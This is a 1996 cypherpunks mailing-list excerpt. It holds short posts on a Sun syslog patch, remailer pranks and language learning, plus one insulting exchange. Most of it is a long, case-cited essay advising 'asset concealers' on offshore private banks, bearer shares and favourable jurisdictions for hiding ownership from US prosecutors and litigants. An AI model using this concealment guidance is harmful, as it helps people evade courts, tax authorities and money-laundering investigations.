>    of these anonymous identities, you're dangerous, and there's no way
>    law enforcement can track it," Suponcic says. "The animal's out of
>    control."
> 
>    Still not content, Suponcic contacted Steven LaTourette, the U.S.
>    Congressman who represents his district. LaTourette's staff suspects
>    that the problem lies with Julf Helsingius, the Finn who runs the
>    anonymous remailer. They wrote a letter to the Finnish ambassador and
>    sent copies to the Secretary of State and the chairman of the House
>    Committee on International Relations. The State Department agreed last
>    week to look into the complaint.
> 
>    But here's a reality check. The Finnish remailer could not have been
>    used, since anon.penet.fi no longer transmits binary image files.
>    Jerry Russell, who runs Florida Online and who looked into the case,
>    says he figures the whole thing was a relatively simple prank called a
>    sendmail spoof, in which the prankster posts a message with a phony
>    return address. He says the Willowick police never produced a copy of
>    the posting for him so that he could unravel the tangle for them.
>    Indeed, when the policeman called, "he didn't really understand what
>    he was trying to tell me," says Russell. "The average Joe Blow police
>    detective doesn't know flip about the Internet."
> 
>    Neither does the average public official. And that, friends, is why
>    stuff like the Communications Decency Act--the Christian Coalition's
>    attempt to remove pornography from the Internet--sails through
>    Congress.
> 
>    --With reporting by Noah Robischon/New York
> 
>      _________________________________________________________________
> 
> 
>    [IMAGE]
> 
>    Text Only

-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|Vincent S. Gunville     
|Robbins-Gioia		 
|209 Madison St                       Email  vingun@rgalex.com
|Alexandria, Va 22314    
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Sat, 30 Mar 1996 04:58:44 +0800
To: mark@zang.com
Subject: Re: Sun patch pulled
In-Reply-To: <199603280505.TAA13153@zang.com>
Message-ID: <doug-9602281442.AA01381320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>The 101759-?? patch is missing from the Feb 1996 SunSolve Patches CD. However
>if one pops in the November 1995 Patches CD there is a nice little copy of
>the 101759-03 patch which also comes with the above warning and the DES
>enabled libraries.
>
>The Patches CD's are openly sent around the world by Sun Support, one CD
>for all the world.
>
>Cheers,
>Mark
>
>
>

Warning!!!!!!! 101759-03 does NOT fix the syslog hole!! Call sun support
and get 101759-04! (they will get it to you one way or another. I had
them ftp it to my anon incoming directory)



--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 31 Mar 1996 01:22:26 +0800
To: cypherpunks@toad.com
Subject: PLease ignore this test message
Message-ID: <199603301357.FAA23035@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



TEst TEst TEst





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Sat, 30 Mar 1996 06:31:12 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <2.2.32.19960328153613.006e3378@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:13 03.28.1996 -0800, Timothy C. May wrote:
>Yes, this is mostly my point. And it is not just me I'm talking about--I
>don't see a compelling need for 95% of Americans to learn a second
>language...in fact, I'd rather they learned to speak and read English
>properly.
>
>(All of the America-bashers who were chiming in earlier today with their
>anti-American jokes...well, here's one for you: "What do you call someone
>who knows how to speak and write English properly? A European.")

Hold on, hold on... :-)  As the first to post along that line, may I
reiterate I'm in no way "anti-American"?  It's just that some Americans (and
some Canadians, and especially some Englishmen) do have a reputation in the
world for going places and expecting the natives to speak their language.
It gets interpreted as arrogance, sometimes unjustly.  Hence some of the jokes.

Funny thing: I rarely hear someone who does know another language argue that
it's not desirable and beneficial; only among the unilingual do I regularly
find such strong feelings.  As a wise man once said (sorry, source unknown):
"If you do not know another language, you do not know your own."  There's a
lot of truth to that... I never knew English as well as I do now before I
learned French, and German in particular helped immensely.  Fact is, once
you know a couple of languages in that group, the others (e.g., Italian,
Spanish, Portuguese, Dutch, Swedish) are relatively easy to pick up because
now you start seeing the underlying patterns -- that in itself being a big
part of knowing your own language better.

Or, as a more contemporary souce (I <g>) would put it: "Speaking with only
one language is like seeing with only one eye."  But try to explain colour
to a blind man... :-/

>very few Americans have any _continuing_ way to use the languages we learn.
>Which is a major reason they are being dropped by many schools.

I agree; I haven't used French practically at all in over 12 years.
However, had I never learned it, I would have been diminished (and, worse,
never known my ignorance).  A language is not just about word-communication;
it is about thought, expression, and especially point of view.  There are
things you can say in English that you could never say the same way in
German, and vice versa; which means that there are ideas and viewpoints you
could never fully appreciate without another language.  If some folks feel
this is unnecessary, well, they can get through life quite well with just
one tongue... that's their decision.

Anyway, apologies for starting this tangent here, since its crypto relevance
is zero or less. :-)  I only wanted to express why the word "compulsion" in
this thread's new title already speaks volumes to me, and to help explain
why this sort of thing sounds to outsiders like another form of isolationism
(not that many countries haven't been getting accused of that recently,
particularly in the East; it's not just a Western thing).

---
Herb Sutter
"If ignorance is bliss, why aren't there more happy people?"
"The nice thing about standards is that there are so many to choose from."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 30 Mar 1996 23:24:26 +0800
To: Steve Gibbons <steve@aztech.net>
Subject: RE: Why Americans feel no compulsion to learn foreign langua
Message-ID: <2.2.32.19960330003531.00682704@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 03/29/96 -700, you wrote:
>More fuel for the fire: I've noticed that I've been able to follow this entire
>thread, and my multi-lingual skills are only as extensive as beer-ordering and
>restroom-finding in a few languages.

The second necessarily follows from the first :-)

Dave
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 31 Mar 1996 04:07:36 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <199603301639.IAA16075@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:36 PM 3/28/96 +0100, JR@ns.cnb.uam.es wrote:
>        I may -or not- trust the people at unimi, but would I also trust
>a lot of intermediate people putting up together a CD-ROM? For that sake,
>and considering the costs of storage and removable storage media, I'd
>bet many people would find more useful to download their copies from
>the net (even once a year only) as I did.

If pieces of the source/executable are digitally signed, you have a basis
for some degree of trust.  (My pgp came with a detached signature.  A bit
self-referental, but at least a start.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 01:05:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: The limits of my patience.
In-Reply-To: <m0u2tez-0008xlC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960330083841.13577A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 29 Mar 1996, jim bell wrote:
> 
> >Anyone who knows me knows I spend all my days end arounding the 
> >U.S. government. 
> 
> Explains a lot!   You _are_ paid for this.  In an earlier era, you would 
> have gladly run the ovens at Auschwitz if you'd gotten paid for it.

You're way out of line here.
I expect an apology.

I've dedicated a lot of time to addressing your issues.  You have 
repeatedly and preemptively brought the discussion into the realms of 
personal attack.  I have endured and rebutted thus far, but you have 
really crossed the line of decency here.  Being called an ass I can 
tolerate, the above I cannot.

> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Mar 1996 01:46:13 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad8241c03f021004d4c1@[205.199.118.202]>
Message-ID: <sBwLLD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> *PLONK*

Thank you for the compliment.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 04:00:01 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Note: Problems Confronting the Asset Concealer [Part 2 of 2 of Volume I]
Message-ID: <Pine.SUN.3.91.960329171657.15388F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



(Volume I - Part 2 of 2)



     The Constitution is of No Help.

The asset concealer who hopes to rely on the constitution to protect 
him might wish to consider the view of one noted scholar:

"The Constitution provides little protection for account holders.  
Courts describe the interest of the United States in enforcing its 
laws as overwhelming and the ability of prosecutors to uncover 
evidence of criminal conduct as essential.  That interest usually 
overwhelms any possible constitutional right of a bank customer.  
United States v. Miller rejected the Fourth Amendment's Search and 
Seizure Clause as a basis for a privacy right in bank records."  (Todd 
Jones, Compulsion Over Comity: The United States' Assault on Foreign 
Bank Secrecy, 12 J. Intl. L. Bus. 454), and cases since have followed 
this holding almost religiously.

As discussed briefly above, it is likewise unlikely that the fifth 
amendment will protect the asset concealer to any degree of certainty.  
Several cases have held that fifth amendment rights do not apply to 
banking records or financial information.  Zicarelli v. New Jersey 
State Comm'n of Investigation, 406 U.S. 472, 478 (1972)(Banks and 
other institutions cannot invoke the self incrimination clause of the 
Fifth Amendment); Braswell v. United States, 487 U.S. 99, 102 (1988); 
Bellis v. United States, 417 U.S. 85, 89-90 (1974).  On the fifth 
amendment concerns See Generally, Comment: Sidestepping Foreign Bank 
Secrecy Laws: No Sanctuary in the Fifth Amendment and Little in the 
Interest of Comity, 10 Hous. J. INT'L L. 57, 57 n.1 (1987).

Corporate entities have no Fifth Amendment protection at all by virtue 
of their agent status, Bellis v. United States, 417 U.S. 85, 89-90 
(1974), and more and more such protection is withheld even if the 
corporate entity is a co-defendant.  Braswell v. United States, 487 
U.S. 99, 102 (1988).  Exceptions may exist for those entities which 
are operated as sole proprietorships.  Braswell at 104 citing United 
States v. Doe, 465 U.S. 605 (1984).

The cases following In re Grand Jury Proceedings, 814 F.2d 791 (1st 
Cir. 1987) demonstrate how the fifth amendment has been eroded or 
eliminated in application to this problem.  In the In re case the 
defendant was directed by the district court to sign a consent form 
permitting the disclosure and production by a financial institution of 
documents protected by Singapore banking secrecy law.  On refusing to 
sign, the defendant was held in contempt.  The investigation alleged 
reporting and currency violations.  The defendant appealed to the 
First Circuit which held the signature as both "testimonial" and 
"self-incriminating."  The court reasoned that the consent form 
"amounts to an assertion" that the bank customer consented to 
production of the requested records and that it was "self-
incriminating" because it could be used to demonstrate incriminating 
facts (e.g., that the accounts in the witness's name existed and were 
within the witness's control).  Even at the time, however, this 
decision was in conflict with the Second, Fifth and Eleventh circuits, 
which have held such an order does not violate the fifth amendment.  
(Typically on the grounds that the forms signed were non-testimonial).

Lately, clever prosecutors and private litigants have evaded the 
testimonial hitch entirely by phrasing their consent forms in the 
hypothetical, and not naming specific account names or numbers.  The 
Supreme Court upheld the order of contempt for a defendant refusing to 
sign such a document.  See, Doe v. United States, 108 S. Ct. 2341 
(1988).  The Court noted that the form was carefully drafted not to 
make reference to a specific account, but only to speak in the 
hypothetical.  Compare the unconstitutional language of the In Re 
Grand Jury form:

"I [witness], consent to the production to the [District Court and 
Grand Jury] of any and all records related to any accounts held by, or 
banking transactions engaged in with, [bank X], which are in the name 
of, or on behalf of: [witness], if any such records exist."

with the now constitutional:

I, [witness], of the State of New York in the United States of 
America, do hereby authorize and direct any bank, trust company, or 
other financial institution located outside of the territorial United 
States at which I have or have had an account of any kind, or at which 
any corporation has or has had an account of any kind upon which I am 
or have been authorized to draw, to disclose all information and 
deliver copies of all documents of every nature in the possession or 
control of such bank, trust company, or other financial institution 
which relate to any such accounts, together with a certificate 
attesting to the authenticity of any and all such documents, to any 
agent or employee of the United States Government who presents a copy 
of this Consent Directive which has been certified by the Clerk of the 
United States District Court for the Northern District of New York to 
such bank, trust company, or other financial institution, and this 
Consent Directive shall be irrevocable authority for doing so.  United 
States v. A Grand Jury Witness, 811 F.2d 114 (2d Cir. 1987).

For more examples See also, United States v. Davis, 767 F.2d at 1040 
(holding any problem of testimonial self-incrimination is solved by 
such an order precluding use of directive as admission); In re Grand 
Jury Proceedings, 814 F.2d at 795 (expressly approving of reasoning in 
Davis); United States v. A Grand Jury Witness, 811 F.2d 114, 117 (2d 
Cir. 1987); United States v. Cid-Molina, 767 F.2d 1131, 1132 (5th Cir 
1985); United States v. Ghidoni, 732 F.2d 814, 818 (11th Cir.), cert. 
denied, 469 U.S. 932 (1984); United States v. Browne, 624 F. Supp. 
245, 248 (N.D.N.Y. 1985); United States v. Quigg, 48 A.F.T.R.2d 81-
5953, 5955 (D. Vt. 1981).

Even more importantly, the character of the "documents" themselves, 
public or private, electronic or paper, would seem to be a factor 
courts will refuse to consider.  Fisher v. United States, 425 U.S. 
391, 410-11 (1976) rejecting both an analysis based on the nature of 
documents and privacy as the policy supporting the fifth amendment.

Some protection still exists.  Many jurisdictions refuse to recognize 
"consent" orders signed under judicial compulsion.  See, In re ABC 
Ltd., 1984 C.I.L.R. 130 (1984) (Grand Court of the Cayman 
Islands)(Consent directives compelled under threat of contempt 
sanctions do not constitute consent under Cayman Bank Secrecy Law); In 
re Confidential Relationships (Preservation) Law, Law 16 of 1976, 
Cause No. 269 of 1984 (Grand Ct. Cayman Islands July 24, 1984).

[...]

IV. Esoteric Considerations

     Intelligence threats:

The asset concealer should note that financial institutions have 
increasingly become the target of foreign intelligence operations.  
The IRS has conducted intelligence operations against foreign banks 
extensively in past and the scope of such operations in the present is 
unclear.  From 1965-1975 the intelligence division of the IRS's 
Jacksonville, Florida district conducted operations named "Tradewinds" 
and "Havens."  Both operations were designed to gather intelligence on 
American investors in offshore banking entities, and expose potential 
tax evasion and criminal activity.  Several IRS agents testified on 
the operations before the House Committee on Government Operations in 
the First Session 94th Congress, 1975.  In 1965, when the Bahamas 
enacted its bank secrecy legislation criminalizing the release of 
banking information, the IRS turned to paid informants within the 
banking community to elicit information about the banking activities 
of U.S. citizens, a tactic that violated Bahamian law.  The most 
dramatic of these was the "briefcase caper," wherein a female IRS 
informer "entertained" a Bahamian banker while her accomplice 
photocopied the contents of his briefcase. United States v. Payner, 
434 F. Supp. 113 (N.D. Ohio 1977), rev'd, 447 U.S. 727 (1980)  The IRS 
finally ceased the operation in 1975 when it admitted that it had 
obtained information in violation of federal law.

The IRS has also shown a propensity for illicit information gathering 
from the mails.  At one time in the late 1960s, the IRS combed through 
mail to identify those U.S. citizens who received mail from Swiss 
Banks.  Though most Swiss banks at the time mailed their customers 
using unmarked envelopes, the IRS aggressively pursued traffic 
analysis in the mails.  Agents from the IRS mailed inquires to several 
Swiss banks and recorded the number of the postal meters used to 
respond.  These collected numbers were matched against international 
mails using high speed copiers at the port of entry and those matching 
the postal meter numbers were audited at "random."  The practice was 
later upheld in United States v. Leonard, 524 F.2d 1076, 36 (2nd Cir. 
1975) cert. denied, 425 U.S. 958 (1976), and some 150 taxpayers were 
prosecuted.  Generally speaking, the Supreme Court has upheld the use 
of illegally obtained information in tax cases in United States v. 
Payner, 447 U.S. 727 (1980).

Given the success of the IRS operations ($52,000,000 at a cost of 
$1,500,000 according to the hearings on Tradewinds and Haven) it is 
difficult to imagine that these methods have been entirely abandoned.  
Moreover, the asset concealer should recognize that today private 
litigants have access to the most professional intelligence services 
themselves.  Organizations like The Investigative Group, Inc., Kroll, 
Pinkerton, and Control Risks, Inc. have recruited former investigative 
and intelligence professionals aggressively and offer their services 
to private litigants as a matter of course.  Given the forgoing the 
private banking option, below, becomes more and more attractive.

Pressure from the IRS alone is not the only concern that asset 
concealers might wish to consider.  Congress has more than once called 
for sanctions against banks that do not bow to the wishes of the 
United States.  Staff of Senate Subcomm. On Narcotics, Terrorism and 
International Operations, 101st Cong., 2d Sess., Drug Money 
Laundering, Banks and Foreign Policy 32 (Comm. Print 1990)  Given 
this, the serious asset concealer should consider using banks that 
hold no assets in the United States, and which do not conduct normal 
banking business in the United States, as these assets, or the banking 
charter generally, could easily be suspended, frozen, or revoked.

[...]

     The Anatomy of a Money Laundering Investigation

[...]

     Private banks

The asset concealer may also wish to consider the option of a private 
bank.  Private offshore banks provide individuals or small groups of 
investors with their very own financial institution.  This, of course, 
reduces the number of individuals with access to banking information, 
allows for the more direct control of records, and all but eliminates 
the potential for coercion of a large banking parent.  In addition, 
private banks create a captive source of loans for investors, provide 
additional funds at interbank rates, allow the payment of interest tax 
free, the participation in tax free international underwriting, assist 
clients in international trusts and corporation formation, and 
eliminate many overhead costs of banking.  If one can balance the 
costs and government fees of forming such a bank, they are the most 
secure and direct method of asset concealing.

Asset concealers who wish to pursue this option would do well to keep 
in mind that their choice of corporate form for their financial 
institution will impact their fifth amendment protections.  Braswell 
v. United States, 487 U.S. 99, 102 (1988)(Normal rule stripping fifth 
amendment protections from financial institutions refusing to comply 
with compelled discovery orders even when named as co-defendants may 
not apply for those entities which are operated as sole 
proprietorships).

In the cases of securities related charges, where at one time charges 
could be filed solely on the basis of the defendants invocation of the 
fifth amendment in reference to questions about the existence of 
foreign bank accounts of financial dealings, in the absence of a 
direct connection, such an assertion alone is no longer enough to 
warrant an action.  See Comserv Corp., 698 F. Supp. at 789. (Absent 
other evidence assertion of Fifth Amendment privilege is "not a 
sufficient basis for the SEC's action." Id. See also Pagel, Inc. v. 
SEC, 803 F.2d 942, 946-47 (8th Cir. 1986)(citing Baxter v. Palmigiano, 
425 U.S. 308, 317 (1976)).

Until around 1965, establishing banks in the Bahamas and other islands 
was simple.  Forming a normal corporation and granting it banking 
powers was about the extent of the efforts required.  The Bahamas 
eventually tightened restrictions and while there are still over 350 
banks on the island, establishing new entities is more difficult 
today.  The Cayman Islands followed suit in 1966, enacting legislation 
virtually identical to that of the Bahamas.  Additional legislation 
passed in 1989 modifies some of the 1966 rules.

While a "bank" is nearly impossible to organize in Bermuda today, 
finance companies can be organized to conduct some quasi-banking 
activities.  The most attractive, and least regulated of the major 
jurisdictions today are Turks and Caicos, and Vanuatu.  Turks and 
Caicos, while regulating "banks" a bit more strictly, allows almost 
unregulated formation of trust companies.  Vanuatu permits the 
formation of exempted banks, making it perhaps the most attractive 
jurisdiction for the asset concealer interested in forming his or her 
own financial institution.  To some extent is it possible to form a 
financial institution in Switzerland, but this has become increasingly 
difficult, and the highest standards for capital pay in and reputation 
make it prohibitively restrictive for most asset concealers.

Jersey, Luxembourg and Guernsey are other options, but all still 
impose strict regulations on the formation of new banks.  Luxembourg 
requires that the banking business be conducted locally, that the new 
bank be sponsored by two well established banks, and that at least 350 
million Lux.F. be paid in prior to formation.  Panama still allows 
offshore bank creation with limited fees and a low paid in capital 
requirement of $250,000 which must be deposited locally.  New banks 
must generally be backed by large and reputable banks.  I remain 
suspicious of actual banking activities in Panama, however, 
considering the increased U.S. presence in the country since the 
ousting of her former dictator.

Netherland Antilles also allows formation of offshore banks which are 
generally treated like investment companies.  Offshore banks can be 
granted a flat tax of 6% on income and require only a 20% pay in of 
the capital requirement which is NAf 1 million.  (1NAf=$0.56 at the 
time of this writing).  Nauru permits offshore banks but a reputation 
requirement often prevents novice applicants from easy approval.  
Nauru does, however, have very low licensing fees, which are usually 
not more than normal trading or holding corporations.

Shell banks (those without substantive assets of any kind) were 
popular until 1977.  They required no paid in capital and were 
commonplace in Anguilla and St. Vincent.  While technically such 
institutions no longer exist, some of the smaller jurisdictions have 
difficulty enforcing their capital and debt-equity ratio requirements, 
often creating "effective" shell bank opportunities after an initial 
showing of capital which is later removable.  For the prudent asset 
concealer, however, shell banks will present a less than desirable 
alternative to meaningful bank licenses in legitimate jurisdictions.

My own views aside, conventional wisdom holds that offshore banks are 
best formed in the Bahamas and Cayman Islands.  Both of these 
jurisdiction's license applications can exceed 100 pages.  Directors 
are generally required to offer proof of bona fide banking experience, 
officers, managers and shareholders required to make disclosures, and 
references checked.  In many cases, as with Vanuatu for example, 
stand-ins for officials, directors and managers are available through 
local trust services.  Initial capital statements are typically 
audited.  Paid in capital requirements are usually $250,000 or more.  
The Cayman Islands and other jurisdictions allow substitution of 
capital for guarantees from reputable banks or trust companies.  
Almost every jurisdiction requires annual license fees.

[...]

See Generally, Peat Marwick's numerous publications.

       Using Private Banks to your Advantage

[...]

       Bearer Shares

Bearer shares are an immensely useful tool to the asset concealer.  
Bearer shares are certificates of equity ownership which are freely 
transferable and embody full ownership rights to the holder.  They do 
not bear the name of the shareholder or beneficiary and are not 
registered.  Bearer shares are generally numbered certificates with 
removable serialized coupons attached which can be exchanged for 
dividend payments, much like bond coupons.  Bearer shares with voting 
rights are generally tallied by deposit with a designated bank in 
exchange for corporate voting ballots issued by the bank before 
shareholder meetings.  Because Bearer shares are not registered, and 
entitle the holder to the full benefits of ownership, and because 
dividend coupons are detachable, a stockholder in the corporation can 
be completely anonymous and a distinct entity from those entitled to 
dividend payments.

Typically on formation trustees accept bearer shares in the 
corporation and later pass them to the actual shareholders who may in 
turn separate the dividend rights, transfer the shares, or both, to a 
third party.  In this manner the ownership of the corporation is 
almost entirely shielded.  Antigua, Barbuda, Liberia, Liechtenstein, 
Luxembourg, Nauru, Netherland Antilles, Panama, Switzerland, and Turks 
and Caicos all permit bearer shares, as do Cayman and Vanuatu for 
exempted companies.

V. Reviews of Specific Jurisdictions

     Why I don't like Switzerland anymore

Not obscure enough.  Spineless.  Switzerland has, perhaps for 
legitimate reasons at first, attracted a tremendous amount of 
attention as a banking secrecy jurisdiction.  The astute asset 
concealer will avoid such jurisdictions where possible as they tend to 
attract suspicion and law enforcement attention.  For example, a 1981 
study by Swiss National Bank and the public prosecutors office 
attributed 26 kidnapping incidents in 1970 and 1978 to Swiss money 
laundering elements in the ransom demands.  (Massnahmen gegen 
"Geldsauberung," Neue Zurcher Zeitung, (NZZ) May 9/10, 1981, No. 106 
at 9).  High profile customers in Swiss banks have attracted so much 
public attention as to make the jurisdiction extremely high profile.  
See, e.g., N. Schmid, Banken Zwischen Legalitat Und Kriminalitat 189-
191 (1986) (King Faisal of Iraq, King Faruk of Egypt, Algerian 
Liberation Front, Ex-Shah of Iran Pahlevi, and Presidents of 
Argentina, Kongo-Katanga, Nicaragua); Internationale Rechtshilfe - 
Gefahr fur das Bankgeheimnis, NZZ, Aug. 30, 1989, No. 200 at 21 
(Marcos, Irangate, drug mafia); The Lifestyle of Rich the Infamous, 
FORTUNE, Dec. 2, 1988, at 38 (tax fugitive Marc Rich).  Cf. 
Nationalrat will scharferen Geldwascher-Artikel, Tages-Anzeiger, Nov. 
28, 1989, No. 277 at 9 (statement of member of Swiss House of 
Representatives)("...no country can point to as many illegal banking 
transactions as Switzerland").

In 1977 a private agreement between the Swiss Bankers' Association 
("SBA") and member banks of the SBA took effect.  The agreement 
establishes a duty of due care in the identification of potential 
account holders and depositors and is intended to reduce the incidence 
of rampid criminal activity through Swiss banks.  (Vereinbarung uber 
die Sorgfaltspflicht bei der Entgegennahme von Geldern unde die 
Handhabung des Bankgeheimnisses)(VSB 1977).  In addition, the Bankers' 
Agreement contains a stipulation that depositors wishing to trade on 
United States securities markets are required to waive their rights to 
secrecy as a condition to trading.  The SBA provides in detail for SEC 
investigations into securities violations involving Swiss banks.

The "Lebanon Connection," was the scandal that most turned the tables 
on Swiss banking secrecy.  (Allegations that several of Switzerland's 
major banks assisted Turkish-Lebanese drug ring over in the laundering 
of proceeds totaling over 1.6 billion francs.  Taglich eine Million 
Dollar gewaschen, Graber, Geldwascherei 42 (1990).  See also, 
Wichtiger als Geldwascher bestrafen ist die Verbrecherorganisation 
treffen, Tages-Anzeiger, Nov. 12, 1988, No. 265 at 33 (Lebanon 
Connection largest Swiss money laundering scandal to date); 
Geldwascherei: Dampf aufgesetzt, Schweizerische Handelszeitung (SHZ), 
Nov. 10, 1988, No. 45 at 17 (Illegal drug profits entered Switzerland 
on daily basis via couriers carrying briefcases filled with dollar 
bills in small denominations).

Immediately after, the Swiss Federal Council (Bundesrat) streamlined 
the typically lethargic elements of Swiss legislative efforts to 
criminalize money laundering, and the new legislation was approved by 
the Swiss Parliament to take effect August 1, 1990 P. Bernasconi, 
Grenzueberschreitende Wirtschaftskriminalitat, 83 Schweizerische 
Juristische Zeitung (Sjz) 73, 82 n. 24 (1987).  Cf.  P. Forstmoser & 
A. Meier/Hayoz, Einfuhrung in das Schweizerische Aktienrecht 329 (4th 
ed. 1989).  Under the law, money laundering crimes are punishable by 
imprisonment for up to five years and by fines of up to one million 
Swiss francs.  (Scweizerisches Strafgesetzbuch, Code Penal Suisse, 
Codice Penale Svizerro, art. 47, 273).  Because the Mutual Assistance 
Treaty with the United States permits release of banking records to 
the United States in the event the activity is illegal in both 
countries, it would seem that money laundering investigations will 
grant prosecutors the right to request, and obtain Swiss banking 
records.

Switzerland has gone on to eliminate the "Form B" account.   
(permitting a proxy to vouch for the depositor, and effectively making 
the account anonymous subject to the proxy's trustworthiness.   Swiss 
Bankers Ass'n, Convention de Diligence Banquers, Form B (1987)).  As 
of April 25, 1991 Swiss banks are now required to record the identity 
of the beneficial owner of depositor accounts, leaving a wider paper 
trail for U.S. prosecutors.  According to one commentator, "In short, 
the United States now has an extremely powerful vehicle with which to 
pierce the veil of Swiss banking secrecy..."  Kanwar M. Singh, Nowhere 
to Hide: Judicial Assistance in Piercing the Veil of Swiss Banking 
Secrecy, 71 B.U.L. Rev. 847.

Even given the legislative tendency to erode Swiss secrecy, one must 
understand that the image Swiss banking secrecy has been much inflated 
in public opinion.  Swiss banks have become very conscious and wary of 
indiscriminately opening accounts which may be the subject of illegal 
funds receipt.  Swiss banks are increasingly reluctant to open new 
numbered accounts.  "Coded" accounts are typically granted only to 
current customers.  Truly "anonymous" accounts do not exist at all in 
Switzerland.  Instead, numbering is directed to avoid internal 
violations of banking secrecy and problems along the line of the 
Bahamas "briefcase caper." Honegger, Demystification of the Swiss 
Banking Secrecy and Illumination of the United States Memorandum of 
Understanding, 9 N.C.J. Int'l L. & Com. Reg. 1, 17 (1983).  In fact, 
contrary to popular belief, purely anonymous accounts do not exist at 
all in Switzerland. H. Bar, The Banking System of Switzerland 61 
(1957).  At the very least one or more senior bank employees will know 
the depositor's identity.  Even in the case of Form B accounts, 
records of depositors were typically kept privately by higher 
officials in the bank.

When taken as a whole, the legislature's specific indication of its 
willingness to erode the protection of banking secrecy in Switzerland, 
the pending legislation, interest in EU membership, acceptance of the 
European Convention on Money Laundering, four other anti-secrecy laws 
recently passed in Switzerland along with the more intrusive internal 
policies of Swiss bankers, my interest in Switzerland as an asset 
concealing jurisdiction is much eroded.  See Generally, Rebecca G. 
Peters, Money Laundering and Its Current Status In Switzerland: New 
Disincentives for Financial Tourism, 11 J. Intl. L. Bus. 104 (1995).

For a defense of the current status of Swiss banking secrecy, however, 
See Paolo S. Grassi and Daniele Calvarese, The Duty of Confidentiality 
of Banks in Switzerland: Where it Stands and Where it Goes. Recent 
Developments and Experience. The Swiss Assistance to, and Cooperation 
with the Italian Authorities in the Investigation of Corruption Among 
Civil Servants in Italy (The "Clean Hands" Investigation): How Much is 
Too Much?

     Why I like Panama.

At one time, Panama was regarded as the leading tax and securities 
trading haven in the Western Hemisphere.  3 W. Diamond & D. Diamond, 
Tax Havens of the World, at Panama-1 (1989).  While the political 
upheaval and overthrow of Manuel Noriega have changed much, many 
aspects of Panamanian law remain friendly to the asset concealer.

Panamanian corporations have no minimum capital requirement, and 
registered shares are not required to be completely paid in.  While 
corporate law requires two shareholders for the purpose of electing a 
board of directors, (which can consist of only three persons, none of 
whom must own shares), after the board is elected the corporation may 
be reduced to one shareholder.  Ownership can be effectuated through 
bearer shares if they are fully paid in, and there are no citizenship 
requirements except for the appointment of a resident agent, who is 
generally the incorporating agent.

"Bearer shares" are well entrenched in Panamanian law.  They allow 
corporate ownership to be shielded quite effectively from 
identification by permitting the corporation fully transferability in 
private face to face transactions of nothing more than the corporate 
share certificates.  Typically, an agent handles incorporation, and 
exchanges the bearer certificates with the principal, who then may 
even exchange it with a second principal, completely shielding the 
final holder of the corporation from identification by the agent 
absent the cooperation of the first principal.  Bearer shares will be 
discussed more fully below.  In addition, Panama continues to maintain 
strict banking secrecy laws and no taxation of income produced from 
sources outside the country.  Large investors may enjoy the benefits 
of extensive  investment and capital incentives.  Banking Law of 
Panama, Law No. 16, Arts. 2-4 (Jan. 28, 1959).

These arrangements have particularly suited Panamanian corporations 
for discrete, indeed totally confidential, securities trading on U.S. 
markets.  Many traders have used Panamanian corporations extensively 
in this regard, and even where the existence of the corporations and 
their complicity in insider trading has been established, few 
investigations have been able to bear the burden required to secure 
convictions.  See, e.g., SEC v. Levine, Civ. Action No. 86-3726 
(S.D.N.Y. filed May 12, 1986)(alleging defendant Levine made 
